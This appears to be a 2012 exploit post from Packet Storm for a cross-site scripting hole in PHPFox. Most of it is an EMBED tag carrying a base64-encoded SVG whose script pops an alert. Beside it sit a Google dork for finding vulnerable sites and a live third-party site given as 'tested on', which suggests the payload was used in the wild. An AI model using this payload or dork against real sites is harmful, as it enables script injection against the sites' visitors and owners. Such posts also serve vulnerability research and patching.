PHPFox suffers from a base64 encoded cross site scripting vulnerability.
34958dbf15938fa0ac5ee7f61e580f94# Exploit Title: phpfox xss exploit
# Google Dork: inurl:powered by phpof
# Date: 25-02-2012
# Author: tRipLeZiX
# Software Link: http://www.phpfox.com/
# Version: allversion
# Tested on: http://www.tanaogi.com/marketplace/6/debot-was-here/
# CVE :
exploit xss code
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3
cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy 8xOTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQwIiBoZWlnaH Q9IjIw
MDAiIGlkPSJ4c3MiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydCgibW FhdiBr
YWxvIHNheWEgdGVybGFsdSBnYW50ZW5nIEItKSIpOzwvc2NyaXB0Pjwvc3ZnPg=="
type="image/svg+xml" AllowScriptAccess="always"></EMBED>
# tHx to: bobyhikaru,vycod,tukulesto,r3de,touya,hylal,bl4Ck_391N3
# Big Thx : indonesiancoder,indonesianhacker,explorercrew
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!